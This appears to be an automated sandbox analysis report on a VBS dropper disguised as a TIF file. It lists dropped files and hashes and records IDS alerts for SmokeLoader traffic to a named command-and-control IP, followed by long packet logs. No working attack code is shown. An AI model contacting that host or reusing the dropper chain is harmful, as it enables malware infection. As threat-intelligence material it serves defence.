                                                                                                                                                    Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):60
                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):60
                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                    Process:C:\Windows\explorer.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):339146
                                                                                                                                                    Entropy (8bit):7.999446943099343
                                                                                                                                                    Encrypted:true
                                                                                                                                                    SSDEEP:6144:ACoRnYvPWWHkAqO+OXu0j4XQYrHI4UbwS5M3Y3g4ILFeTkRWWgEXzVyMQBUJtQCx:ACE0c3O1YrSF5MIQUkR5djVyMQWrQC9/
                                                                                                                                                    MD5:D43B0AE2DD3CD06BC4D281F54AD1F0D8
                                                                                                                                                    SHA1:D06DE8C7C709CDD484D1DCADC6CBD8229A0BCBBA
                                                                                                                                                    SHA-256:21D89097E940DC5C8B94178757EC08763C44BB14A6D9B43A84A7C06CC0DCC76E
                                                                                                                                                    SHA-512:70B295DB1A036EC6E424AE3ADF5F4AF8021A1C0B33ED5CE42C94916E53D7BCB22C3C6C660D7603EC75BFAFC5D20D4360AB5864584EC0304007D49BFFF02D4D9F
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:9@m..9..6..L.O..M3.vm..vf.3\..50.I.2.h.%......d6J+?4....m.\......Q.0.....\`.mg.....Z~4.HT..W/..M.I~.....0..0...9[.f.......R...?..J..;bGk]...f.u.j<..%[3.4..e.#1.(...7.3 ...5./.6=..^{SP...h.J..uc...L.S.K..MJ ...P...|...?...B.>R..-(.....E.T.tP\~!.y.#g8..N.iD..:K;J.|.[...X....E,.k.+.."u.O.Gr..%K.*x.r.;...lV.......Z.[E......YKU...:\......].?.p........eq...E....|.u.N.Du..5.n.72.5wiO.....bgL4.'.9...#..t...]v.. ...57......L.FwR.....~./PX...FN ej.4r.I.Z.H2.$kR..=j.....M.W.H.%.I..bv)......r.xE.....G}..[.?.Oc!../W:.....3.>5:..jX.{d...U}...>l....X..#p.lK...>...n*...<i..g&....'U3..L.fI..XS..]^f...|V.... <+..:..c..en.1..J....M'.....xk......'Z.v......l.......=>1.w3...G..-n!...3|.l....(o}.YWW-..7f.5......xP...J.g.....%...$*(1r.....A...9A...+K{$..L...D..`5..-Q..2h.%*$Y....{..!..B\....T.D-W...4...<2.V4.n....N...[..+.6. ....V).!p....w."`.:.%.s..:..,.!.R6_z%...........o.K....5x....-"....w5\.*R."...N..H3...E}..|s]...Mn.Wm....%..Rh./.;..#...q.#.8......$..
                                                                                                                                                    Process:C:\Windows\explorer.exe
                                                                                                                                                    File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):56368
                                                                                                                                                    Entropy (8bit):6.120994357619221
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:768:fF9E8FLLs2Zokf85d9PTV6Iq8Fnqf7P+WxqWKnz8DH:ffE6EkfOd9PT86dWvKgb
                                                                                                                                                    MD5:FDA8C8F2A4E100AFB14C13DFCBCAB2D2
                                                                                                                                                    SHA1:19DFD86294C4A525BA21C6AF77681B2A9BBECB55
                                                                                                                                                    SHA-256:99A2C778C9A6486639D0AFF1A7D2D494C2B0DC4C7913EBCB7BFEA50A2F1D0B09
                                                                                                                                                    SHA-512:94F0ACE37CAE77BE9935CF4FC8AAA94691343D3B38DE5E16C663B902C220BFF513CD02256C7AF2D815A23DD30439582DDBB0880009C76BBF36FF8FBC1A6DDC18
                                                                                                                                                    Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: begoodforeverythinggreatthingsformebetterforgood.hta, Detection: malicious
• Filename: bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.hta, Detection: malicious
• Filename: kissmegoodthingwhichgivemebestthignswithgirluaremy.hta, Detection: malicious
• Filename: bestgirlfriendwhowintheheartwithentirelifegivenubestthigns.hta, Detection: malicious
• Filename: invoice727282_PDF..exe, Detection: malicious
• Filename: #U0410#U0433#U0440#U043e-#U0410#U043b#U044c#U044f#U043d#U0441_(PO_460387320)_pdf.vbs, Detection: malicious
• Filename: 6038732).vbs, Detection: malicious
• Filename: cirby0J3LP.exe, Detection: malicious
• Filename: SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe, Detection: malicious
• Filename: SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe, Detection: malicious
                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A>.]..............0................. ........@.. ....................................`.................................t...O.......................0B..........<................................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......t3..pc.............X...<........................................0..........s.....Y.....(.....Z.....&..(......+....(....o......r...p(....-..r...p(....,.....X....i2..-;(....(..........%.r!..p.(....(....((...(....(....(....( .....-.(7...(.....*.(....-..*.~S...-.~R....S...s!.....~W...o"....~U...o#....~V...o$....o%...~Y...o&...~S...~Q...~T....s'....P...~P...sE...o(............~W....@_,s.....()...r7..p.$(*........o+..........o,....2....... ....37(....(8.........%...o-....
Process: C:\Users\user\AppData\Roaming\uahuajd
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 221
Entropy (8bit): 4.801526423190794
Encrypted: false
SSDEEP: 6:zx3Me21f1LRJIQtAMw/VgRZBXVN+1GFJqozrCib:zKpj1JIUwqBFN+1Q3b
MD5: A3DCA41A950A7DF7ECE76A867A17400E
SHA1: AA9EFDBCF37BEE2C7FD0986F1A4308A73EC3F7BB
SHA-256: 6B2BE177016DF867316A0C432DAB0B71B6E51B35D169B0ACB1ABB47A4C03D7C0
SHA-512: F80207B5B78C7AE867AAB139196BBBEDE0437961DD03E790AEF3B877A228D7A90B9178B3342324B0EEA1C270E2A232A769B2F2D9E5DB4C065EB95140FA12239D
Malicious: false
Preview: Microsoft (R) ASP.NET Compilation Tool version 4.8.4084.0..Utility to precompile an ASP.NET application..Copyright (C) Microsoft Corporation. All rights reserved.....Run 'aspnet_compiler -?' for a list of valid options...
File type: Unicode text, UTF-8 text, with very long lines (12085), with CRLF line terminators
Entropy (8bit): 5.3949239509459925
TrID:
• Visual Basic Script (13500/0) 100.00%
File name: sweetnessgoodforgreatnessthingswithgood.tIF.vbs
File size: 224'763 bytes
MD5: 8ccd875893cd23b67d7c61ea735f5c52
SHA1: 6171c7dd4f67a67fff0ca151c7e9a06104e00def
SHA256: 16328212055d6aa79c45b6624607f74b732b159db4c6cdf7d8e6835ebdc6e392
SHA512: 3ceb06944fb1cb3f176e9163f761e3c2d97e72a9e0177f417d4a83e03f4b539fbcb2d7ebe53865a483cacdc8eaf16ce292245aed1cc60c207f7ca038ced07f31
SSDEEP: 3072:A8gVmI3b0mgfmWu+ke9VOv5iG5sVhQ30Wk+70wgA1A:A8gVxe9VOvM
TLSH: 9C2402311C8A82326E1E58095820F110DA8DE47368BFD4D177BEDFE95B122D588AFF67
File Content Preview: Dim sh 'WScript.Shell object..Dim fso 'Scripting.FileSystemObject..Dim format 'StringFormatter object..Dim suiteFolder 'string: folder where test suite scripts are located..Dim projectFolder 'string: root folder for this project..Dim suiteFilter 'string:
Icon Hash: 68d69b8f86ab9a86
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-09T08:02:45.418836+0100 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.7 | 49913 | 46.173.214.14 | 80 | TCP
2025-01-09T08:02:45.689594+0100 | 2829848 | ETPRO MALWARE SmokeLoader encrypted module (3) | 2 | 46.173.214.14 | 80 | 192.168.2.7 | 49913 | TCP
2025-01-09T08:02:50.795369+0100 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.7 | 49942 | 46.173.214.14 | 80 | TCP
2025-01-09T08:04:02.534429+0100 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.7 | 49987 | 46.173.214.14 | 80 | TCP
2025-01-09T08:04:04.159872+0100 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.7 | 49988 | 46.173.214.14 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                    Jan 9, 2025 08:02:45.555284977 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.555295944 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.555322886 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.555335999 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.555362940 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.555407047 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.555963993 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.555988073 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.555999994 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.556011915 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.556025982 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.556039095 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.556065083 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.556673050 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.556734085 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.556746006 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.556786060 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.556794882 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.556880951 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.558938980 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.607976913 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.676004887 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.676019907 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.676033020 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.676106930 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.689594030 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.689606905 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.689618111 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.689630985 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.689665079 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.689704895 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.689811945 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.689822912 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.689832926 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.689860106 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.689882994 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.689979076 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.690042019 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.690053940 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.690085888 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.690259933 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.690269947 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.690295935 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.690376997 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.690418959 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.690449953 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.690464973 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.690680027 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.690689087 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.690726042 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.690787077 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.690814972 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.690829039 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.690870047 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.691052914 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.691093922 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.691123962 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.691134930 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.691174030 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.691344023 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.691410065 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.691423893 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.691462040 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.691464901 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.691731930 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.691751957 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.691783905 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.691812038 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.691953897 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.691965103 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.691976070 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.692004919 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.692197084 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.692208052 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.692229986 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.692240953 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.692276955 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.692317009 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.692558050 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.692567110 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.692609072 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.692673922 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.692692995 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.692703009 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.692724943 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.692740917 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.693013906 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.693023920 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.693041086 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.693064928 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.693092108 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.693104029 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.693140984 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.693548918 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.693561077 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.693571091 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.693603039 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.693788052 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.693799973 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.693839073 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.720618963 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.720629930 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.720642090 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.720655918 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.720695019 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.720740080 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.799387932 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.799401999 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.799437046 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.799551010 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.799631119 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.799642086 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.799685955 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.811043024 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.811290026 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.824759007 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.824776888 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.824798107 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.824832916 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.824872017 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.824882984 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.824915886 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.824939013 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.824976921 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.824986935 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.825000048 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.825045109 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.825228930 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.825238943 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.825273037 CET4991380192.168.2.746.173.214.14
Jan 9, 2025 08:02:45.825377941 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.825387955 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.825406075 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.825422049 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.825422049 CET  49913  80     192.168.2.7    46.173.214.14
Jan 9, 2025 08:02:45.825434923 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.825467110 CET  49913  80     192.168.2.7    46.173.214.14
Jan 9, 2025 08:02:45.825618982 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.825629950 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.825639963 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.825671911 CET  49913  80     192.168.2.7    46.173.214.14
Jan 9, 2025 08:02:45.825684071 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.825687885 CET  49913  80     192.168.2.7    46.173.214.14
Jan 9, 2025 08:02:45.825695992 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.825737953 CET  49913  80     192.168.2.7    46.173.214.14
Jan 9, 2025 08:02:45.825870991 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.825880051 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.825922012 CET  49913  80     192.168.2.7    46.173.214.14
Jan 9, 2025 08:02:45.825951099 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.825961113 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.826011896 CET  49913  80     192.168.2.7    46.173.214.14
Jan 9, 2025 08:02:45.826147079 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.826194048 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.826204062 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.826241970 CET  49913  80     192.168.2.7    46.173.214.14
Jan 9, 2025 08:02:45.826296091 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.826344967 CET  49913  80     192.168.2.7    46.173.214.14
Jan 9, 2025 08:02:45.826412916 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.826524973 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.826538086 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.826562881 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.826571941 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.826584101 CET  49913  80     192.168.2.7    46.173.214.14
Jan 9, 2025 08:02:45.826615095 CET  49913  80     192.168.2.7    46.173.214.14
Jan 9, 2025 08:02:45.826692104 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.826791048 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.826833963 CET  49913  80     192.168.2.7    46.173.214.14
Jan 9, 2025 08:02:45.826893091 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.826922894 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.826927900 CET  49913  80     192.168.2.7    46.173.214.14
Jan 9, 2025 08:02:45.826935053 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.827007055 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.827013016 CET  49913  80     192.168.2.7    46.173.214.14
Jan 9, 2025 08:02:45.827301025 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.827370882 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.827380896 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.827418089 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.827420950 CET  49913  80     192.168.2.7    46.173.214.14
Jan 9, 2025 08:02:45.827441931 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.827482939 CET  49913  80     192.168.2.7    46.173.214.14
Jan 9, 2025 08:02:45.827539921 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.827548981 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.827584982 CET  49913  80     192.168.2.7    46.173.214.14
Jan 9, 2025 08:02:45.827595949 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.827652931 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.827662945 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.827701092 CET  49913  80     192.168.2.7    46.173.214.14
Jan 9, 2025 08:02:45.828136921 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.828181028 CET  49913  80     192.168.2.7    46.173.214.14
Jan 9, 2025 08:02:45.828191996 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.828205109 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.828243017 CET  49913  80     192.168.2.7    46.173.214.14
Jan 9, 2025 08:02:45.829709053 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.829720020 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.829730988 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.829757929 CET  49913  80     192.168.2.7    46.173.214.14
Jan 9, 2025 08:02:45.829758883 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.829771996 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.829782963 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.829806089 CET  49913  80     192.168.2.7    46.173.214.14
Jan 9, 2025 08:02:45.829828024 CET  49913  80     192.168.2.7    46.173.214.14
Jan 9, 2025 08:02:45.829963923 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.829974890 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.829987049 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.829999924 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.830010891 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.830014944 CET  49913  80     192.168.2.7    46.173.214.14
Jan 9, 2025 08:02:45.830029964 CET  49913  80     192.168.2.7    46.173.214.14
